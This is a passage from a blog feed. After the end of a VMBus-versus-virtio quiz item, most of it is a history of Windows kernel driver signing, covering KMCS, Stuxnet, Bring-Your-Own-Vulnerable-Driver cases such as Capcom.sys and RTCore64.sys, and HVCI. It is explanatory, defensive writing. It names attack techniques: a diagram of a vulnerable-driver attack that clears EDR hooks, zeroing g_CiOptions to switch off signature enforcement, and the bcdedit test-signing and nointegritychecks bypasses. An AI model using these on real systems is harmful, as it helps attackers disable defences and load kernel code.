  { q: &quot;Compare VMBus&apos;s ring-buffer transport to virtio&apos;s virtqueues. What is the same and what is different?&quot;, a: &quot;Same: shared-memory rings carrying descriptors and payload; doorbell-based signalling so per-message hypercall cost amortises across batches; per-device-class protocols layered on a common transport. Different: VMBus uses a software-only &apos;bus&apos; with offer/open/close/rescind control, while virtio rides on a real PCI/MMIO/channel-I/O transport with a generic capability-bit mechanism. VMBus&apos;s reverse signal is a SINT; virtio&apos;s is MSI-X. VMBus is Microsoft-owned under the OSP; virtio is OASIS-ratified and multi-vendor. VMBus has in-box Windows drivers and broader synthetic-service coverage (KVP, time sync, VSS); virtio has cross-hypervisor portability and a multi-vendor implementation pool.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>hyper-v</category><category>virtualization</category><category>vmbus</category><category>paravirtualization</category><category>azure</category><category>confidential-computing</category><category>security</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>The Driver That Was Signed and the Driver That Won&apos;t Load: Windows Kernel Code Integrity, 2006-2026</title><link>https://paragmali.com/blog/windows-kernel-code-integrity-2006-2026/</link><guid isPermaLink="true">https://paragmali.com/blog/windows-kernel-code-integrity-2006-2026/</guid><description>A history of Windows kernel code-signing -- KMCS, BYOVD, HVCI, the Vulnerable Driver Block List, and why a 2026 Windows kernel uses five gates to decide what loads.</description><pubDate>Thu, 14 May 2026 00:00:00 GMT</pubDate><content:encoded>
**Windows ships a list of Microsoft-signed drivers it refuses to load.** That list -- `DriverSiPolicy.p7b` -- exists because every previous generation of kernel-driver trust assumed a signed driver was a safe driver, and a twenty-year run of Bring-Your-Own-Vulnerable-Driver attacks (Stuxnet, Capcom.sys, RTCore64.sys, gdrv.sys) proved that assumption wrong. The 2026 default-on stack -- KMCS, the block list, HVCI in VTL1, Smart App Control, and Defender ASR coverage -- is five gates doing what one ideal gate cannot do: name the specific weakness, not just the publisher. The architectural gap that motivates the stack is undecidable in principle and will not close.
&lt;h2&gt;1. The Driver That Loaded&lt;/h2&gt;
&lt;p&gt;On 13 September 2016, the researcher Matt Nelson posted on his &lt;em&gt;enigma0x3&lt;/em&gt; blog that a Capcom-published kernel driver, &lt;code&gt;Capcom.sys&lt;/code&gt;, exposed IOCTL &lt;code&gt;0xAA013044&lt;/code&gt; and used it to execute a user-supplied function pointer in kernel mode, with SMEP disabled along the way [@gh-tandasat-capcom] [@gh-tandasat-capcom]. Within two weeks the technique was operational in Metasploit. Later in September 2016, Capcom pushed the same driver to Street Fighter V&apos;s entire installed base as part of an anti-cheat update; in October 2016, Satoshi Tanda published the canonical standalone exploit on GitHub. Capcom withdrew the SFV driver shortly after, but the bytes were already in the wild.The often-told version of this story compresses three distinct events into one. @TheWack0lian&apos;s 23 September 2016 Twitter disclosure named the IOCTL number and the function-pointer-execution primitive. OJ Reeves opened the canonical Metasploit pull request, rapid7/metasploit-framework#7363 [@gh-msf-pr-7363], shortly after; the PR was created on 27 September 2016 and merged the following day [@gh-msf-pr-7363]. Satoshi Tanda&apos;s &lt;code&gt;tandasat/ExploitCapcom&lt;/code&gt; repository was first published in October 2016 and is the canonical standalone PoC, and the artefact this article cites for the IOCTL number and SHA-1 hash.&lt;/p&gt;
&lt;p&gt;The driver was properly Authenticode-signed. It chained to a Microsoft-recognised root. It loaded cleanly on every default-configured Windows 7, 8.1, and 10 machine in the world.&lt;/p&gt;
&lt;p&gt;That is the puzzle this article exists to answer. How does an operating system whose entire kernel-loading policy is &lt;em&gt;was this binary signed?&lt;/em&gt; answer a vulnerability whose only failure mode is &lt;em&gt;yes, by a real publisher, doing exactly what the signature says it does&lt;/em&gt;?&lt;/p&gt;
&lt;h3&gt;A class, not an incident&lt;/h3&gt;
&lt;p&gt;Capcom.sys was not the first signed kernel driver with a primitive IOCTL, and it would not be the last. The pattern recurs across two decades and is the through-line of this article. The catalogue includes Micro-Star&apos;s &lt;code&gt;RTCore64.sys&lt;/code&gt; (the kernel component of MSI Afterburner), Gigabyte&apos;s &lt;code&gt;gdrv.sys&lt;/code&gt;, and the &lt;code&gt;KProcessHacker&lt;/code&gt; driver shipped with Process Hacker. Section 4 walks through each one with its primary disclosure record.&lt;/p&gt;
&lt;p&gt;The attack class has a name. &lt;em&gt;Bring Your Own Vulnerable Driver&lt;/em&gt;, or BYOVD. The adversary does not need to find a kernel zero-day. They need to find one signed driver, anywhere, whose interface is unsafe by design, and to ship it.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Windows in 2026 ships a curated list of Microsoft-signed drivers it refuses to load. Understanding that list is understanding why every previous attempt to make kernel-mode trust mean &lt;em&gt;safety&lt;/em&gt; instead of just &lt;em&gt;identity&lt;/em&gt; eventually broke.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The current Windows 11 22H2 client honours &lt;code&gt;%windir%\system32\CodeIntegrity\DriverSiPolicy.p7b&lt;/code&gt;, a Microsoft-signed deny list enforced by a hypervisor-isolated code-integrity engine sitting in Virtual Trust Level 1. The same engine refuses to map any kernel page that is simultaneously writable and executable. Both behaviours are documented on Microsoft Learn&apos;s Memory Integrity page [@ms-hvci-vbs] and the Microsoft-recommended driver block rules page [@ms-driver-block-rules] [@ms-hvci-vbs] [@ms-driver-block-rules]. Neither existed in 2006.&lt;/p&gt;
&lt;p&gt;To understand why Windows now refuses to load drivers it once asked Microsoft to sign, we need to go back thirty years to the moment Windows first asked a publisher to sign anything at all.&lt;/p&gt;
&lt;h2&gt;2. Advisory Trust: 1996 to 2005&lt;/h2&gt;
&lt;p&gt;For its first decade, the Windows driver signing policy was a polite recommendation.&lt;/p&gt;
&lt;p&gt;Microsoft shipped its first user-mode code-signing primitive, &lt;a href=&quot;https://paragmali.com/blog/authenticode-and-catalog-files-the-crypto-foundation-under-w/&quot; rel=&quot;noopener&quot;&gt;Authenticode&lt;/a&gt;, in 1996, packaged for developers in the same tool kit that gave us &lt;code&gt;SignTool&lt;/code&gt;, &lt;code&gt;MakeCat&lt;/code&gt;, and &lt;code&gt;Inf2Cat&lt;/code&gt; -- the suite Microsoft Learn still documents under &quot;Cryptography tools&quot; [@ms-crypto-tools] [@ms-crypto-tools]. Authenticode wrapped a PKCS#7 signature around the SHA-1 (and later SHA-256) hash of a PE image and let a recipient walk the signer&apos;s certificate chain to a trusted root. It was the first answer to the question &lt;em&gt;who shipped this binary?&lt;/em&gt; It was, deliberately, never an answer to &lt;em&gt;is this binary safe?&lt;/em&gt;&lt;/p&gt;

Microsoft&apos;s PKCS#7-based code-signing format for Windows binaries. Authenticode attests to the publisher&apos;s identity by binding the binary&apos;s hash to a certificate chain anchored at a trusted root. It does not analyse the program&apos;s behaviour.
&lt;p&gt;For drivers, the user-mode signing primitive was paired with a separate quality program. The Windows Hardware Quality Labs programme, documented today via the Hardware Lab Kit [@ms-hlk], tested third-party drivers against a Microsoft-curated compatibility suite and rewarded passing drivers with a counter-signature, eventually surfaced as the &quot;Designed for Windows&quot; or &quot;Certified for Windows&quot; mark [@ms-hlk]. The badge was operationally meaningful for OEM badging and Windows Update distribution. It was not a load-time gate. An unsigned &lt;code&gt;.sys&lt;/code&gt; file dropped on disk by a setup script still loaded.&lt;/p&gt;

Microsoft&apos;s compatibility-test programme for third-party drivers. A driver that passes the HLK test suite receives a Microsoft counter-signature and is eligible for OEM and Windows Update distribution. The programme produces a quality signal, not a load-time enforcement decision.
&lt;h3&gt;The SetupAPI prompt&lt;/h3&gt;
&lt;p&gt;On 32-bit Windows, the gate the user actually saw was the SetupAPI driver-installation prompt. The administrator could set the system to &lt;em&gt;Ignore&lt;/em&gt;, &lt;em&gt;Warn&lt;/em&gt;, or &lt;em&gt;Block&lt;/em&gt; unsigned drivers; the default was &lt;em&gt;Warn&lt;/em&gt;. &lt;em&gt;Warn&lt;/em&gt; meant a click-through dialog at install time. An administrator who clicked &lt;em&gt;Install this driver anyway&lt;/em&gt; loaded the unsigned driver, no further questions asked. The structural truth is the one Microsoft&apos;s modern KMCS policy page [@ms-kmcs-policy] acknowledges by contrast: under advisory policy, the prompt is the policy, and a prompt is exactly as strong as the user clicking past it [@ms-kmcs-policy].&lt;/p&gt;
&lt;p&gt;The Sony BMG XCP incident in October 2005 made the structural weakness concrete. The XCP copy-protection software, shipped on retail audio CDs, autorun-installed an unsigned kernel-mode filter driver. The driver hid any file, registry key, or process whose name began with the string &lt;code&gt;$sys$&lt;/code&gt; -- a textbook rootkit by capability if not by intent. The driver loaded after an administrator clicked through the warning prompt, exactly as advisory policy allowed. The pattern is described well in Wikipedia&apos;s code-signing article [@wp-code-signing] [@wp-code-signing].The Sony BMG XCP rootkit triggered class-action lawsuits, FTC settlements, and an industry-wide reconsideration of what &quot;the user clicked OK&quot; actually authorises. From a kernel-trust perspective, the lesson is narrower: any policy that ends in a dismissible dialog has the same threat model as no policy at all, against an attacker who can show the user a dialog.&lt;/p&gt;
&lt;p&gt;The structural takeaway from 1996 through 2005 is the one the next decade tried to repair. When the signing policy is advisory, an attacker who has -- or can socially engineer -- administrator privilege only needs to dismiss a prompt to load a kernel driver. The signing primitive worked. The policy around the primitive did not.&lt;/p&gt;
&lt;p&gt;If the prompt is the only thing between an attacker and ring zero, the kernel itself has to take over. And on a brand-new x64 architecture, Microsoft could break backward compatibility to make that happen.&lt;/p&gt;
&lt;h2&gt;3. KMCS: The Vista x64 Revolution (2006-2016)&lt;/h2&gt;
&lt;p&gt;In November 2006, Vista x64 made a decision that x86 never could: it refused to load any unsigned kernel driver, full stop.&lt;/p&gt;
&lt;p&gt;The mechanism was Kernel-Mode Code Signing, or KMCS. The previous-versions Microsoft Learn page on Vista-era driver signing [@learn-microsoft-com-design-dn653567vvs85]) records the policy [@ms-dn653567]. At the point where the kernel loaded a driver image (the &lt;code&gt;IopLoadDriver&lt;/code&gt; → &lt;code&gt;MmLoadSystemImage&lt;/code&gt; path), the Code Integrity module (&lt;code&gt;ci.dll&lt;/code&gt;) intercepted the load, extracted the Authenticode signature embedded in the PE image or attached via a published catalogue, walked the certificate chain, and refused to map the image if the chain did not terminate at a Microsoft-trusted root. There was no SetupAPI prompt to dismiss. If the kernel refused, the kernel refused. The decision lived below the user&apos;s reach.&lt;/p&gt;

The Vista-era mandatory load-time signature policy on 64-bit Windows. Before mapping a kernel driver&apos;s PE image, the Code Integrity module verifies that the image&apos;s Authenticode signature chains to a Microsoft-trusted root. Drivers that fail the check are refused at load time, not at install time.
&lt;p&gt;x86 kept the advisory policy. Microsoft could not break compatibility with two decades of unsigned drivers on the dominant platform. But x64 was a young architecture with a few hundred drivers in the field, and Microsoft used that moment to flip the default. The structural shift was real: kernel-driver trust on x64 became a property of the binary, decided in the kernel, against a fixed set of trusted roots.&lt;/p&gt;
&lt;h3&gt;Cross-certificates: opening the gate to the world&lt;/h3&gt;
&lt;p&gt;A Microsoft-trusted root alone would have meant Microsoft signs every driver, which Microsoft did not want. Instead Microsoft cross-certified a small set of commercial code-signing certificate authorities -- including VeriSign, DigiCert, Entrust, GlobalSign, GoDaddy, and several smaller successors enumerated on the historical cross-certificate list (2020 archive) [@ms-cross-cert-archive] -- so that a publisher could buy a code-signing certificate from a commercial CA, sign their driver, and have the chain still terminate at a Microsoft-recognised root [@ms-cross-cert-archive]. The architecture is documented on the cross-certificates for kernel-mode code signing page [@ms-cross-cert], which now opens with a sentence that did not exist in 2006: &quot;Cross-signing is no longer accepted for driver signing&quot; [@ms-cross-cert]. We will come back to that.&lt;/p&gt;

sequenceDiagram
    participant IO as I/O Manager
    participant CI as Code Integrity (ci.dll)
    participant CA as Cross-certified CA chain
    participant Root as Microsoft trusted root&lt;pre&gt;&lt;code&gt;IO-&amp;gt;&amp;gt;CI: Map PE for kernel driver
CI-&amp;gt;&amp;gt;CI: Extract Authenticode signature (PKCS#7)
CI-&amp;gt;&amp;gt;CA: Walk certificate chain
CA-&amp;gt;&amp;gt;Root: Anchor at Microsoft cross-cert
alt Chain valid and not revoked
    CI-&amp;gt;&amp;gt;IO: Allow section creation
    IO-&amp;gt;&amp;gt;IO: Load driver into kernel address space
else Chain invalid or unsigned
    CI-&amp;gt;&amp;gt;IO: STATUS_INVALID_IMAGE_HASH
    IO-&amp;gt;&amp;gt;IO: Abort load
end
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Documented escape hatches&lt;/h3&gt;
&lt;p&gt;KMCS shipped with three documented bypasses for developers and special cases, all enumerated on the KMCS policy page [@ms-kmcs-policy] [@ms-kmcs-policy]:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;bcdedit /set TESTSIGNING ON&lt;/code&gt; enables test-signing mode. The kernel will load drivers signed with self-issued test certificates. The cost is a desktop watermark.&lt;/li&gt;
&lt;li&gt;The F8 advanced-boot option &lt;em&gt;Disable Driver Signature Enforcement&lt;/em&gt; turns off KMCS for one boot.&lt;/li&gt;
&lt;li&gt;The legacy &lt;code&gt;nointegritychecks&lt;/code&gt; BCD flag disables enforcement entirely, but is rejected on systems where &lt;a href=&quot;https://paragmali.com/blog/secure-boot-in-windows-the-chain-from-sector-zero-to-userini/&quot; rel=&quot;noopener&quot;&gt;Secure Boot&lt;/a&gt; is on.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Each of these was a development workflow concession. Each of them, with admin privileges and a willingness to reboot, also serves as a kernel-driver loading path for an attacker who has already escalated. The policy holds against unprivileged adversaries. Against an attacker who already runs as administrator, the policy was already, by 2010, defending against a different threat than the one people thought it was defending against.Microsoft has been formally clear about this since at least 2016: the administrator-to-kernel transition is not a security boundary in the MSRC servicing-criteria sense. Elastic Security Labs writes the position out explicitly in their analysis of vulnerable-driver mitigations [@elastic-admin] [@elastic-admin]. The historical irony is that Vista x64 KMCS was widely read at the time as a defence against admin-level adversaries; it was actually a defence against unprivileged or pre-admin ones.&lt;/p&gt;
&lt;h3&gt;PatchGuard: the parallel runtime defence&lt;/h3&gt;
&lt;p&gt;KMCS was a load-time check. The runtime parallel arrived in 2005 with Kernel Patch Protection, informally PatchGuard or KPP, which the Wikipedia entry on Kernel Patch Protection [@wp-kpp] describes as a feature of 64-bit Windows that prevents patching of critical kernel structures [@wp-kpp]. KPP polls a set of integrity-critical kernel objects -- the System Service Descriptor Table, IDT, GDT, certain function prologues -- and triggers a bug check if it detects tampering. It is the watchdog against runtime modification of the kernel by code that has already loaded; KMCS gates what loads in the first place.&lt;/p&gt;
&lt;p&gt;What this fixed: the unsigned-driver-loading path closed on 64-bit Windows in production mode. Kernel rootkits of the early 2000s -- FU, Mailbot, Rustock, and their contemporaries, widely documented in the security-research literature of the era -- could no longer ship as bare &lt;code&gt;.sys&lt;/code&gt; files an admin script dropped on disk. The structural class of &quot;unsigned kernel rootkit&quot; effectively died on x64.&lt;/p&gt;
&lt;p&gt;But the day Vista x64 shipped, two new attack surfaces opened up. The first one Stuxnet found four years later. The second one nobody had a name for yet.&lt;/p&gt;
&lt;h2&gt;4. Stuxnet, BYOVD, and the Two Things Vista Did Not Fix&lt;/h2&gt;
&lt;p&gt;On 17 June 2010, researchers in Belarus and Iran identified Stuxnet, a worm targeting supervisory control and data acquisition systems [@wp-stuxnet] used in industrial-control environments [@wp-stuxnet]. Two of its drivers carried perfectly valid Authenticode signatures.&lt;/p&gt;
&lt;p&gt;The signatures were genuine. The certificates were not. Stuxnet had been signed with private keys stolen from semiconductor vendors whose code-signing certs chained to legitimate cross-certified roots. KMCS verified the chain, found it good, and let the drivers load.Stuxnet is widely reported to have used stolen signing keys from two real semiconductor vendors. The malware-analysis literature is consistent on the pattern; specific cert-holder attributions are reproduced in many places but the primary advisory record we cite here is the Wikipedia Stuxnet article [@wp-stuxnet] and the general framing in the Wikipedia code-signing article [@wp-code-signing] [@wp-stuxnet] [@wp-code-signing]. The reactive answer was certificate revocation, but revocation propagates through Windows on a schedule, not instantly, and the cached chain on millions of machines remained valid for days.&lt;/p&gt;
&lt;p&gt;That was the first failure mode KMCS could not block by design. The signature primitive answers &lt;em&gt;was this signed by a key that chains to a trusted root?&lt;/em&gt; It cannot answer &lt;em&gt;was the key still in the publisher&apos;s control when it signed this?&lt;/em&gt;&lt;/p&gt;
&lt;h3&gt;The Capcom.sys reframe&lt;/h3&gt;
&lt;p&gt;The second failure mode arrived publicly in 2016. A Capcom driver shipped via a Street Fighter V update exposed an IOCTL, numbered &lt;code&gt;0xAA013044&lt;/code&gt;, that took a user-supplied function pointer and executed it in kernel mode -- with Supervisor Mode Execution Prevention (SMEP) disabled while it did so. The driver was signed and chained correctly. Satoshi Tanda&apos;s standalone proof of concept at &lt;code&gt;tandasat/ExploitCapcom&lt;/code&gt; [@gh-tandasat-capcom] remains the canonical reference, including the SHA-1 of the binary (&lt;code&gt;c1d5cf8c43e7679b782630e93f5e6420ca1749a7&lt;/code&gt;) [@gh-tandasat-capcom].&lt;/p&gt;
&lt;p&gt;There was nothing for KMCS to catch. The driver did exactly what the signature said it did: ship bytes from a publisher Microsoft could identify. The signature has no opinion about the IOCTL surface.&lt;/p&gt;

A signed driver means only that someone Microsoft can identify shipped this binary. It does not mean the driver lacks a function-pointer IOCTL.
&lt;p&gt;That observation is the first of three reframes in this article and the easiest to underestimate. Up to 2010 the conventional security reading of a Microsoft-rooted Authenticode signature was that the driver had passed a review. After Stuxnet, the reading narrowed to &lt;em&gt;the publisher is identifiable&lt;/em&gt;. After Capcom.sys, it narrowed again to &lt;em&gt;the binary&apos;s identity is verifiable&lt;/em&gt;. None of these readings includes &lt;em&gt;the binary does not have a kernel-write primitive in its IOCTL handler&lt;/em&gt;.&lt;/p&gt;

An attack pattern in which an adversary, having obtained or already holding administrator privileges, installs a signed but design-vulnerable third-party kernel driver and uses its exposed primitives -- arbitrary memory read/write, port I/O, MSR access, or function-pointer dispatch -- to gain ring-zero capability. The signature primitive does not refuse the load because the driver is, on signature alone, legitimate.
&lt;h3&gt;The catalogue grows&lt;/h3&gt;
&lt;p&gt;The BYOVD catalogue accumulated through the 2010s.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;RTCore64.sys&lt;/code&gt;, the kernel component of MSI&apos;s Afterburner overclocking utility, exposed read/write access to arbitrary kernel memory, I/O ports, and Model-Specific Registers from user mode. The NVD entry for CVE-2019-16098 [@nvd-cve-2019-16098] is unusually direct: &quot;These signed drivers can also be used to bypass the Microsoft driver-signing policy to deploy malicious code.&quot; [@nvd-cve-2019-16098] The driver became a workhorse for ransomware crews. Sophos&apos;s October 2022 incident analysis of BlackByte&apos;s new variant [@sophos-blackbyte] documents the abuse: BlackByte &quot;abus[ed] a known vulnerability in the legitimate vulnerable driver RTCore64.sys&quot; to disable &quot;a whopping list of over 1,000 drivers on which security products rely to provide protection&quot; [@sophos-blackbyte].&lt;/p&gt;
&lt;p&gt;&lt;code&gt;gdrv.sys&lt;/code&gt;, the Gigabyte APP Center driver, exposed a ring-zero memcpy-equivalent that a local attacker could use to overwrite arbitrary kernel addresses. CVE-2018-19320 [@nvd-cve-2018-19320] is on CISA&apos;s Known Exploited Vulnerabilities catalogue [@nvd-cve-2018-19320]. The RobinHood ransomware abused it during the 2019 Baltimore municipal-government attack -- a connection widely documented by Sophos and CrowdStrike incident-response teams, though absent from the bare NVD record.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;KProcessHacker&lt;/code&gt;, the kernel companion to the Process Hacker administration tool, exposed a process-termination primitive that bypassed even the Protected Process Light (PPL) shielding around antivirus and EDR processes. CrowdStrike&apos;s DoppelPaymer write-up [@cs-doppelpaymer] documents the abuse explicitly: &quot;the hijacking technique ... leverages ProcessHacker&apos;s kernel driver, KProcessHacker, that has been registered under the service name KProcessHacker3 ... terminate processes, including those protected by Protected Process Light (PPL).&quot; [@cs-doppelpaymer]&lt;/p&gt;

sequenceDiagram
    participant Adv as Adversary (admin user mode)
    participant SCM as Service Control Manager
    participant CI as Code Integrity (ci.dll)
    participant Drv as Signed vulnerable driver
    participant K as Kernel state&lt;pre&gt;&lt;code&gt;Adv-&amp;gt;&amp;gt;SCM: Install signed driver as kernel service
SCM-&amp;gt;&amp;gt;CI: Request load
CI-&amp;gt;&amp;gt;CI: Authenticode check passes
CI-&amp;gt;&amp;gt;SCM: Allow
SCM-&amp;gt;&amp;gt;Drv: Load into kernel
Adv-&amp;gt;&amp;gt;Drv: IOCTL with attacker-supplied pointers
Drv-&amp;gt;&amp;gt;K: Write attacker bytes at arbitrary kernel address
K-&amp;gt;&amp;gt;K: Clear EDR notify routine / escalate token
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;The third bypass: patching the policy from kernel mode&lt;/h3&gt;
&lt;p&gt;There is a third failure mode that closes the loop. Once an attacker has a signed driver with an arbitrary kernel-write primitive, they can write directly into the in-kernel Code Integrity state. The variable of interest is &lt;code&gt;g_CiOptions&lt;/code&gt;, an integer inside &lt;code&gt;ci.dll&lt;/code&gt; whose bits gate Driver Signature Enforcement. TrustedSec describes the technique cleanly: &quot;this configuration variable has a number of flags that can be set, but typically for bypassing DSE this value is set to 0, completely disabled DSE and allows the attacker to load unsigned drivers just fine.&quot; [@trustedsec-gcioptions] Set &lt;code&gt;g_CiOptions&lt;/code&gt; to zero and the subsequent driver loads do not need signatures at all. The signed driver, in effect, is a one-shot key that opens the gate for any unsigned driver behind it. The pattern recurs through the early 2020s; specific malware-family attributions remain research-folklore, but the technique class is well attested in TrustedSec&apos;s account.&lt;/p&gt;
&lt;p&gt;The structural takeaway: KMCS verifies &lt;em&gt;who signed&lt;/em&gt;, never &lt;em&gt;what was signed&lt;/em&gt;. Once an attacker has a signed driver with a write primitive, they have ring zero. Stricter signing closes the front door for new malicious drivers. Every commercial-CA cert that was ever issued is still loadable. The policy decision has to move out of the attacker&apos;s reach. And the kernel itself has to stop being the thing that decides.&lt;/p&gt;
&lt;h2&gt;5. Microsoft as the Only Signer (2016-2024)&lt;/h2&gt;
&lt;p&gt;In August 2016, Microsoft did something the WHQL programme had refused to do for twenty years: it became the only entity that could counter-sign a new Windows kernel driver.&lt;/p&gt;
&lt;p&gt;The transition shipped with Windows 10 version 1607. The KMCS policy page [@ms-kmcs-policy] records the cut precisely: for end-entity certificates issued after 29 July 2015, the chain had to terminate at one of three Microsoft-owned roots -- &lt;em&gt;Microsoft Root Authority 2010&lt;/em&gt;, &lt;em&gt;Microsoft Root Certificate Authority&lt;/em&gt;, or &lt;em&gt;Microsoft Root Authority&lt;/em&gt; -- and the binary had to be counter-signed via the Windows Hardware Dev Center submission portal [@ms-kmcs-policy]. The commercial CAs were out. Microsoft was in, as the single point through which any new third-party kernel driver had to pass.&lt;/p&gt;
&lt;h3&gt;Two pipelines&lt;/h3&gt;
&lt;p&gt;Behind the portal sat two submission paths. The HLK/WHQL path required a full Hardware Lab Kit compatibility test pass on the publisher&apos;s hardware -- the lab kit is the modern incarnation of the WHQL programme, documented on Microsoft Learn [@ms-hlk] [@ms-hlk]. A passing run produced a &quot;Certified for Windows&quot; mark and made the driver eligible for OEM badging and Windows Update distribution. The lighter-friction path, called attestation signing [@ms-attestation], did not require an HLK run [@ms-attestation]. The publisher submitted a CAB containing the driver and supporting metadata. Microsoft&apos;s backend ran a malware scan and an automated policy check; if both passed, Microsoft applied a counter-signature. Attestation-signed drivers, the page notes, ship only to client SKUs.&lt;/p&gt;

The lower-friction post-2016 Microsoft signing path for Windows kernel drivers. The publisher uploads a CAB to the Hardware Dev Center; Microsoft runs malware scanning and an automated policy check; on pass, Microsoft applies its counter-signature. The path replaces full HLK testing for client-only drivers.
&lt;h3&gt;EV certificates as the account-binding primitive&lt;/h3&gt;
&lt;p&gt;Both paths required the publisher to hold an Extended Validation code-signing certificate. The EV cert does not sign the driver image itself; it signs and binds the Hardware Dev Center submission. That gives Microsoft a real-name handle on every kernel-driver publisher. EV certificates ride a strong identity check, cost meaningfully more than commercial OV certs, and live on a hardware token in the publisher&apos;s possession. The 2021 Microsoft Security blog announcing the Vulnerable &amp;amp; Malicious Driver Reporting Center spells the requirement out: &quot;Kernel-mode driver publishers must pass the Hardware Lab Kit (HLK) compatibility tests, malware scanning, and prove their identity through extended validation (EV) certificates.&quot; [@ms-vdrc-blog]&lt;/p&gt;

flowchart LR
    A[Publisher EV cert + driver CAB] --&amp;gt; B[Hardware Dev Center upload]
    B --&amp;gt; C[Malware scan]
    C --&amp;gt; D{HLK required?}
    D -- &quot;Yes&quot; --&amp;gt; E[HLK compatibility test pass]
    D -- &quot;No&quot; --&amp;gt; F[Attestation policy check]
    E --&amp;gt; G[Microsoft counter-sign]
    F --&amp;gt; G
    G --&amp;gt; H[Optional Windows Update distribution]
&lt;h3&gt;The legacy long tail&lt;/h3&gt;
&lt;p&gt;The pivot to Microsoft-only signing closed the door for new drivers. It did not close the door for old ones.&lt;/p&gt;

The KMCS policy page [@ms-kmcs-policy] is candid about the carve-outs: &quot;Cross-signed drivers are still permitted if any of the following are true: The PC was upgraded from an earlier release of Windows to Windows 10, version 1607. Secure Boot is off in the BIOS. Drivers was signed with an end-entity certificate issued prior to July 29th 2015 that chains to a supported cross-signed CA.&quot; [@ms-kmcs-policy]&lt;p&gt;Operationally, every signed-but-vulnerable driver from the 2006-2015 era remains loadable on a meaningful population of Windows machines: upgraded installs, devices with Secure Boot disabled in firmware, and drivers with pre-cutoff end-entity certs whose chains are still valid. &lt;code&gt;Capcom.sys&lt;/code&gt;, &lt;code&gt;RTCore64.sys&lt;/code&gt;, &lt;code&gt;gdrv.sys&lt;/code&gt;, &lt;code&gt;KProcessHacker&lt;/code&gt; -- the entire 2010s BYOVD catalogue -- continues to chain to roots Windows still accepts.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;h3&gt;What attestation signing catches and what it does not&lt;/h3&gt;
&lt;p&gt;The malware scan inside attestation signing looks for known dangerous behaviour. The Microsoft Security blog post on the Vulnerable &amp;amp; Malicious Driver Reporting Center enumerates the categories the backend flags: &quot;Drivers with the ability to read or write arbitrary kernel, physical, or device memory, including Port I/O and central processing unit (CPU) registers from user mode.&quot; [@ms-vdrc-blog] In other words, the scanner already understands the BYOVD pattern.&lt;/p&gt;
&lt;p&gt;What it does not catch are &lt;em&gt;novel&lt;/em&gt; design flaws. A driver whose IOCTL surface is structurally unsafe in a way the scanner does not have a signature for passes the scan and ships with a Microsoft counter-signature. The Capcom.sys pattern is in the scanner&apos;s repertoire today; the pattern in the next driver to ship is, by definition, not.&lt;/p&gt;
&lt;p&gt;A second weakness sits on the publisher side. EV-key compromise -- whether through the LAPSUS$ supply-chain leaks of 2022 or other vendor incidents -- gives the attacker the Microsoft-only-signing flavour of the Stuxnet problem. The signed-by-Microsoft chain is exactly as strong as the EV key&apos;s safekeeping at the publisher.&lt;/p&gt;
&lt;p&gt;One bottleneck for signing is an improvement. But the bottleneck still trusts the kernel that asks the question. As long as the policy engine runs in the same memory the attacker can write, the policy engine loses.&lt;/p&gt;
&lt;h2&gt;6. HVCI: Moving the Policy Out of Reach (2015-present)&lt;/h2&gt;
&lt;p&gt;In July 2015, Microsoft shipped a feature so structurally important that it took six years to become a consumer default, and so misunderstood that it still travels under three different names.&lt;/p&gt;
&lt;p&gt;The names are the easiest place to start. &lt;em&gt;Virtualization-Based Security&lt;/em&gt; (VBS) is the platform: a Hyper-V-rooted virtualisation layer that exists on every modern Windows installation that meets the hardware requirements. &lt;em&gt;Hypervisor-protected Code Integrity&lt;/em&gt; (HVCI) is the kernel-code-integrity consumer of VBS. &lt;em&gt;Memory Integrity&lt;/em&gt; is the label the Windows Security UI uses today. The Microsoft Learn page on Memory Integrity [@ms-hvci-vbs] is the canonical primary source [@ms-hvci-vbs]. TrustedSec called out the conflation explicitly in their &lt;code&gt;g_CiOptions in a virtualized world&lt;/code&gt; post [@trustedsec-gcioptions] [@trustedsec-gcioptions].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; A security check that shares a trust domain with what it is checking has, by definition, already lost. HVCI moves the check out of the attacker&apos;s trust domain. It is the answer to &lt;em&gt;who decides&lt;/em&gt;. It is not the answer to &lt;em&gt;what gets decided&lt;/em&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;That sentence is the second of this article&apos;s three reframes, and the one that makes everything that follows make sense.&lt;/p&gt;
&lt;h3&gt;VBS and the Virtual Trust Levels&lt;/h3&gt;
&lt;p&gt;On a VBS-on Windows machine, &lt;a href=&quot;https://paragmali.com/blog/above-ring-zero-how-the-windows-hypervisor-became-a-security/&quot; rel=&quot;noopener&quot;&gt;Hyper-V&lt;/a&gt; is the Type-1 hypervisor. The bootloader brings the hypervisor up first, the hypervisor brings up two execution environments side by side, and the normal Windows kernel runs in one of them while a much smaller &lt;a href=&quot;https://paragmali.com/blog/the-windows-secure-kernel/&quot; rel=&quot;noopener&quot;&gt;Secure Kernel&lt;/a&gt; runs in the other.&lt;/p&gt;

The VBS abstraction that partitions a Windows installation into two execution environments. VTL0 is the normal Windows kernel and its drivers. VTL1 is a much smaller Secure Kernel and a curated set of &quot;trustlets&quot; -- isolated user-mode processes that hold the most sensitive secrets. VTL1 can read and write VTL0 memory; VTL0 cannot read or write VTL1 memory. Code-integrity policy lives in VTL1.
